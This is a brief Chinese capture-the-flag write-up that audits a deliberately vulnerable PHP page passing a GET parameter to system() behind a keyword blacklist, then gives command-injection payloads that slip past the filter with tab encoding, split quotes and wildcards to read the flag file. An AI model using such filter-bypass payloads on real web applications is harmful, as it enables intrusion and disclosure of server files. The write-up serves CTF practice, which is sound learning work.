代码审计
<?phpif(isset($_GET['c'])){$c=$_GET['c'];if(!preg_match("/\;|cat|flag| |[0-9]|\\$|\*|more|less|head|sort|tail|sed|cut|awk|strings|od|curl|\`/i", $c))//增加了几个函数{system($c." >/dev/null 2>&1");}}else{highlight_file(__FILE__);}
可以用
web43方法,替换没过滤的函数,例如tac,这里学习了新姿势?c=nl<fla''g.php|| ?c=tac%09fla?.php||
若有收获,就点个赞吧
0 人点赞
